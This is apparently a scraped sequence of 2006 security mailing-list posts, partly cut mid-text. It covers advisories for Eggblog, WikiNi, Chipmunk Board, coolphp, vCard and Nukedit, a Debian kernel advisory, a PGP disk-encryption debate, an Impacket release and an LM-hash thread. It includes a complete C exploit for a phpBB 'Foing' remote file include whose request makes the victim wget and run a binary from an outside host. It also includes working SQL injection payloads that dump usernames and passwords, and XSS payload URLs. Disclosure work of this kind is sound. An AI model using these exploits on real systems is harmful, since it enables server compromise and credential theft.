Vulnerability found. * 28/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=41 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=41 _ Dont just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/
RE: Advisory: Eggblog = 3.x Multiple Remote Vulnerabilities
These issues have been fixed as of v3.07. v2 is not supported and should no longer be available to download. Please let me know if this is not the case. Thanks, Egg www.eggblog.net -Original Message- From: Mustafa Can Bjorn IPEKCI [mailto:[EMAIL PROTECTED] Sent: 28 May 2006 15:01 To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; [EMAIL PROTECTED] Subject: Advisory: Eggblog = 3.x Multiple Remote Vulnerabilities --Security Report-- Advisory: Eggblog = 3.x Multiple Remote Vulnerabilities --- Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI --- Date: 27/05/06 06:15 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: Eggblog (http://www.eggblog.net/) Version: 3.0.6 and prior versions must be affected. About: Via this method remote attacker can inject arbitrary SQL queries to Eggblog.This SQL injection works with Eggblog version 3.0.6 and below.The problem is that id parameter id rss/posts.php did not sanitized properly before using it in SQL query.This caused to remote attacker inject arbitrary SQL queries and execute them.This SQL injection needs magic_quotes_gpc off. There is another problem in Eggblog 2.x.In registration member register status did not sanitized properly.This caused to remote attacker register new member as a admin nick and get administration privileges on Eggblog. Level: Critical --- HowExample: GET - http://[site]/[EggBlog]/rss/posts.php?id=SQL EXAMPLE - http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat(' Username:%20',username), concat('Password:%20',password)/**/from/**/eggblog_members/* POST/EXAMPLE - http://[site]/[EggBlog]/home/register.php?username=victimpassword=password; [EMAIL PROTECTED]ref= -- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=36 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=36
Re: Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING
[EMAIL PROTECTED] wrote: This to answer Mr Jon Callas (PGP CTO) and to show him the last proof-of-concept. If he did not get it we consider we have done our part to report a BIG problem in PGP unless this is some kinda of HIDDEN features. We do not know why they just see one side of the coin. I don't quite see the other side. They, and several others here have explained what is happening. At most I can see a user interface issue here, as I will detail below: What if you had created a virtual disk and give that to someone. That someone use it as his/her own disk This is unsafe, unless the disk is reencrypted. and decided to change the password because they own the disk now The assumption that changing the password will disallow access from a former owner of _that_ very same disk is wrong. You have to reencrypt the disk, if you want to take full ownership of the data. So they did change the passowrd, but the originator can still access that disk if he/she replace the passphrase bytes in the binary file. That is not even necessary. You can just save the actual encryption key and decrypt the disk with a modified software. So I consider this an attack on data INTEGRITY and data AVAILABILITY Containers of this kind cannot assure this anyway. Integrity of the file might be checkable, but what is the point in checking the integrity of data you want to protect from an adversary that can decrypt the data anyway? Are you suggesting that the software should check for a modified header? How should the software do that? Said header is perfectly valid. It is just for another time in the disks lifecycle. So you could only check it together with the whole disk. That would mean hashing a few GB of data ... everytime you unmount the disk. Or at least everytime you want to check integrity - so at least at mount time ... And: What would that give? An attacker can easily disable such checks. Regarding availability: since the legitimate user will be denied access to the disk after replacing the passphrase bytes. How do you want to avoid that? If an attacker has write access to a container file, he can just as well overwrite it with gibberish, thus really denying access. A cryptocontainer is designed to thwart illegitimate access to data. It is not designed to protect its content against manipulation. why you do not want to see that your password verification can be simply bypassed, It cannot. You can only restore a previous version of the disk key, which was encrypted by a known password. You could just as well simply store the disk key. besides a reputable co. like PGP should at least put anti-debugging tweaks, What for? Security by obscurity? If you use it properly, it is absolutely irrelevant, if the encryption software is being traced. If you cannot recover the disk key, you can't read a single thing making sense. You are _not_ bypassing any authentication with your trick. You are only using you previous knowledge about the disk key in an obscure way. You can just as well jump ahead in the code to the point where the disk key is there in decrypted form, replace it by the known value and run on. No need to even enter a password actually. or even encrypt/hide the passphrase location It is encrypted. Let's sketch the way such programs work again: When a container is created, a random disk key (DK) is generated. This is what is used to actually encrypt the sectors on the disk. When reading/writing, something along the lines of D_S(DK,[sector ciphertext]) or E_S(DK,[sector plaintext] is used to en/decrypt the sector, where D_S and E_S are the sector de-/encryption functions, which often take additional state parameters (like the sector number) to avoid some watermarking attacks etc. As humans are very bad at remembering 256 Bit binary (or hex or base64 or ...) values, this key needs to be stored somewhere. Unless hardware crypto tokens are in use, where can you store it? First idea: On disk. But: This would be ridiculously insecure. The solution is, to store it, but encrypted. So what disk encryption programs usually do, is to store the actual disk key somewhere in the volume header of the container - encrypted with the passphrase the user has to give when mounting. Of course one could as well derive the disk key directly from the passphrase. However that has the disadvantage of not being able to change the passphrase easily. Let's reiterate the workings once more: When doing operations on the disk like reading/writing sectors, the Disk Key DK is used like this: D/E_S(DK,[sector cipher/plaintext]). The key DK has been randomly generated at volume creation time. When a user mounts a crypto volume, the Disk Key needs to be determined. This is done by entering a password/phrase. This passphrase is then used to decrypt an encrypted version of DK. So what is in the volume header is E_DK(K_DK(passphrase),DK) where E_DK is an encryption function
Foing Remote File Include Vulnerability [PHPBB]
vendor : phpbbhacks.com Exploit BY :s3rv3r_hack3r WWW : http://www.hackerz.ir Exploit /* Foing Remote File Include exploit By s3rv3r_hack3r */ #include stdio.h #include stdlib.h #include string.h #include unistd.h #include sys/types.h #include sys/socket.h #include netinet/in.h #include arpa/inet.h #define PORT 80 char shellop[] = GET /index.php?phpbb_root_path=http://www.hackerz.ir/cmd.txt?cmd=cd ../../../../../../../../../../tmp;wget http://www.hackerz.ir/r0nin;; chmod +X r0nin;./r0nin%60%22|\r; int main(int argc, char *argv[]) { char shell[BUFSIZ]; int sock; struct sockaddr_in remop; if(argc != 2) { printf(\n\n); printf(\n Iran Hackerz Security Team \n); printf(\nWebSite's: www.hackerz.ir www.h4ckerz.com \n); printf(\n\n); printf(\n*Foing Remote File Include Vulnerability [PHPBB]* \n); printf(\n\n); printf(\nUsage: http://www.Victim.ltd/[foingpath]\n); printf(\n\n); return 0; } if(argc == 2) { printf(\n\n); printf(\nExploit By : [EMAIL PROTECTED]\n); printf(\nPLZ A W8\n); printf(\n\n); remop.sin_family = AF_INET; remop.sin_port = htons(PORT); remop.sin_addr.s_addr = inet_addr(argv[1]); if((sock = socket(AF_INET, SOCK_STREAM, 0)) 0) { printf(\nERROR: Socket()\n\n); return -1; } if(connect(sock,(struct sockaddr *)remop, sizeof(struct sockaddr)) 0) { printf(\nERROR: Connect()\n\n); return -1; } if(send(sock,shellop, sizeof(shellop), 0) 0) { printf(\nERROR: Send()\n\n); return -1; } close(sock); sleep(3); printf(\nr0nin run seccessfuly\n\n); printf(\n); } return 0; }
New SMB and DCERPC features on Impacket released with doc
Hi! As we promised in the too short 5 minutes talk at CanSecWest last month, here we are publishing a new version of Impacket including all the new features we added for SMB and DCERPC. At the same time we are releasing a document describing what this new and weird features are, full of examples of how to use them, including a crash for MS05-039 (UMPNP remotely exploitable buffer overflow), writen in python using this library, which can be used as base for other DCERPC exploits and configured in lots of different ways to send non-standard and correct trafic. Some of the new features are: * NMB and SMB (high-level implementations). * DCE/RPC versions 4 and 5, over different transports: UDP (version 4 exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP. * Multiple ways of doing SMB tree_connect, file open, read, write. * SMB fragmentation, SMB AndX command chaining. * Plain, NT and LM v1 authentications, using password and hashes only. * Portions of the following DCE/RPC interfaces: Conv, DCOM, EPM, SAMR, SvcCtl, WinReg. * DCERPC Alternate contexts, Multi-bind requests, Endianness selection * DCERPC NT and LM v1 authentication, integrity checking and encryption. * DCERPC v4 and v5 fragmentation, DCERPC v4 idempotent requests. take a look here: http://www.corest.com/common/showdoc.php?idx=539idxseccion=11 and send feedback, to us gera and beto
WikiNi Persistent Cross Site Scripting Vulnerability
Hi, I've found a vulnerability more than 2 months ago, and notified the developers, but still no answer, so I'm posting here. http://zone14.free.fr/advisories/3/ Vendor: WikiNi Vulnerable: WikiNi 0.4.2 and below Persistent Cross Site Scripting A persistent XSS vulnerability is the most dangerous kind of XSS vulnerabilities, as the data submitted by the malicious user is stored permanently on the server. It could potentially hit a large number of other users with little need for social engineering. Just edit a page and insert: scriptalert('XSS Vulnerable');/script Restrictions The attacker needs to have the rights to edit at least one page of the wiki, but most of the time it is the case. Moreover, WikiNi 0.4.2 is used on more than 100,000 pages according to Google. --Raphaël HUCK
[SECURITY] [DSA 1082-1] New Linux kernel 2.4.17 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1082-1[EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze, Dann Frazier May 29th, 2006 http://www.debian.org/security/faq - -- Package: kernel-image-2.4.17-hppa kernel-image-2.4.17-ia64 kernel-image-2.4.17-s390 kernel-patch-2.4.17-apus kernel-patch-2.4.17-mips kernel-patch-2.4.17-s390 kernel-source-2.4.17 Vulnerability : several Problem-Type : local/remote Debian-specific: no CVE IDs: CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685 CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135 Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2004-0427 A local denial of service vulnerability in do_fork() has been found. CVE-2005-0489 A local denial of service vulnerability in proc memory handling has been found. CVE-2004-0394 A buffer overflow in the panic handling code has been found. CVE-2004-0447 A local denial of service vulnerability through a null pointer dereference in the IA64 process handling code has been found. CVE-2004-0554 A local denial of service vulnerability through an infinite loop in the signal handler code has been found. CVE-2004-0565 An information leak in the context switch code has been found on the IA64 architecture. CVE-2004-0685 Unsafe use of copy_to_user in USB drivers may disclose sensitive information. CVE-2005-0001 A race condition in the i386 page fault handler may allow privilege escalation. CVE-2004-0883 Multiple vulnerabilities in the SMB filesystem code may allow denial of service of information disclosure. CVE-2004-0949 An information leak discovered in the SMB filesystem code. CVE-2004-1016 A local denial of service vulnerability has been found in the SCM layer. CVE-2004-1333 An integer overflow in the terminal code may allow a local denial of service vulnerability. CVE-2004-0997 A local privilege escalation in the MIPS assembly code has been found. CVE-2004-1335 A memory leak in the ip_options_get() function may lead to denial of service. CVE-2004-1017 Multiple overflows exist in the io_edgeport driver which might be usable as a denial of service attack vector. CVE-2005-0124 Bryan Fulton reported a bounds checking bug in the coda_pioctl function which may allow local users to execute arbitrary code or trigger a denial of service attack. CVE-2005-0528 A local privilege escalation in the mremap function has been found CVE-2003-0984 Inproper initialization of the RTC may disclose information. CVE-2004-1070 Insufficient input sanitising in the load_elf_binary() function may lead to privilege escalation. CVE-2004-1071 Incorrect error handling in the binfmt_elf loader may lead to privilege escalation. CVE-2004-1072 A buffer overflow in the binfmt_elf loader may lead to privilege escalation or denial of service. CVE-2004-1073 The open_exec function may disclose information. CVE-2004-1074 The binfmt code is vulnerable to denial of service through malformed a.out binaries. CVE-2004-0138 A denial of service vulnerability in the ELF loader has been found. CVE-2004-1068 A programming error in the unix_dgram_recvmsg() function may lead to privilege escalation. CVE-2004-1234 The ELF loader is vulnerable to denial of service through malformed binaries. CVE-2005-0003 Crafted ELF binaries may lead to privilege escalation, due to insufficient checking of overlapping memory regions. CVE-2004-1235 A race condition in the load_elf_library() and binfmt_aout() functions may allow privilege escalation. CVE-2005-0504 An integer overflow in the Moxa driver may lead to privilege escalation. CVE-2005-0384 A remote denial of service vulnerability has been found in the PPP driver. CVE-2005-0135 An IA64 specific local denial of service vulnerability has been found in the unw_unwind_to_user() function. The following matrix explains which kernel version for which architecture fix the problems mentioned
Multiple Xss exploits in Chipmunk Board
Subject: Multiple Xss exploits in Chipmunk Board Date: 27 May 2006 10:51:30 - Multiple Xss exploits in Chipmunk Board forum type : Chipmunk Board bug found by : black-codesweet-devil team : site-down type : Xss black-code: codes : http://www.example.com/board/index.php?forumID='scriptalert(10)/script http://www.example.com/board/newtopic.php?forumID='scriptalert(10)/script http://www.example.com/board/reply.php?forumID='scriptalert(10)/script http://www.example.com/board/edit.php?forumIDID='scriptalert(10)/script http://www.example.com/board/edit.php?quote.php?forumID=forumIDID='scriptalert(10)/script http://www.example.com/board/edit.php?forumID=forumIDID='scriptalert(10)/script http://www.example.com/board/edit.php?quote.php?forumID=forumIDID='scriptalert(10)/script http://www.example.com/board/edit.php?quote.php?forumID=forumIDID='scriptalert(10)/script http://www.example.com/board/newtopic.php?forumID='scriptalert(10)/script path to admin login: http://www.xxx.com/path/admin All my respect to my friend sweet-devil , lezr.com , g123g.net .. done .. peace _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
RE: Multiple Xss exploits in coolphp magazine
Subject: Multiple Xss exploits in coolphp magazine Date: 27 May 2006 14:25:31 - Multiple Xss exploits in coolphp magazine script type : coolphp magazine bug found by : black-code sweet-devil team : site-down type : Xss Codes : *** http://www.xxx.com/coolphp/index.php?op='scriptalert(10)/script http://www.xxx.com/coolphp/index.php?op=userinfonick='scriptalert(10)/script *** And : http://www.xxx.com/coolphp/index.php?op=='scriptalert(10)/script Put instaed of any name as : http://xxx.net/coolphp/index.php?op=userinfo='scriptalert(10)/script or http://xxx.net/coolphp/index.php?op=comp_der='scriptalert(10)/script or http://xxx.net/coolphp/index.php?op=encuestas='scriptalert(10)/script or http://xxx.net/coolphp/index.php?op=pagina='scriptalert(10)/script Emails : [EMAIL PROTECTED] [EMAIL PROTECTED] All my respect to my friend sweet-devil , lezr.com , g123g.net .. done .. peace _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
multiple Xss exploits in : vCard 2.9
Subject: multiple Xss exploits in : vCard 2.9 Date: 27 May 2006 11:12:55 - multiple Xss exploits in : vCard 2.9 forum type : vCard 2.9 bug found by : black-codesweet-devil team : site-down type : Xss sweet-devil: http://www.example.com/cards/create.php?card_id='scriptalert(10)/script http://www.example.com/cards/toprated.php?page='scriptalert(10)/script black-code: http://www.example.com/cards/newcards.php?page='scriptalert(10)/script path to admin login: http://www.xxx.com/pth/admin All my respect to my friend sweet-devil , lezr.com , g123g.net .. done .. peace _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[KAPDA::#46] - Nukedit Unauthorized Admin Add
[KAPDA::#46] - Nukedit Unauthorized Admin Add KAPDA New advisory Vulnerable product : Nukedit = 4.9.6 Vendor: http://www.nukedit.com Vulnerability: Unauthorized Admin Add Date : Found : 2006/05/10 Vendor Contacted : N/A Release Date : 2006/05/29 About Nukedit : Nukedit is a Content Management System (CMS). Vulnerable page: utilities/register.asp PoC: HTML PoC : http://kapda.ir/attach-1661-nukedit.txt Save this code as .htm and then execute. This exploit will create an admin acount . Then login with your email ! + your password . Solution: Update to new version of nukedit . Original Advisory: http://www.kapda.ir/advisory-337.html Credit : FarhadKey of KAPDA farhadkey [at} kapda d0t net Kapda - Security Science Researchers Insitute of Iran http://www.KAPDA.ir
Re: LM hashes in a hot-desking environment
On Sat, 27 May 2006, Ansgar -59cobalt- Wiechers wrote: On 2006-05-25 [EMAIL PROTECTED] wrote: Although it is a well known fact that Windows desktops and servers still use LM Hashes and cache the last ten userids and passwords locally, just in-case an Active Directory, Domain, or NDS tree are not available, has anyone thought about the consequences of this issue in a hot-desking, or flexible working environment? That's why you use policies to disable use of LM hashes and caching of passwords in environments like that. Exactly. You don't do caching on computers that won't ever come off the network. i.e. don't do it on desktops. If you have that much of a problem with AD being unavailable, you better look more closely at your AD architecture. You may do caching on laptops, and then i'd hope you don't have people sharing laptops. If you do, well then, that's another story requiring careful consideration, but a little off-topic. --Tony .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.- Anthony J. BiaccoSystems/Network Administrator [EMAIL PROTECTED] http://www.asteroid-b612.org as I always say, why go Merlot, when you can call a Cab? .-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-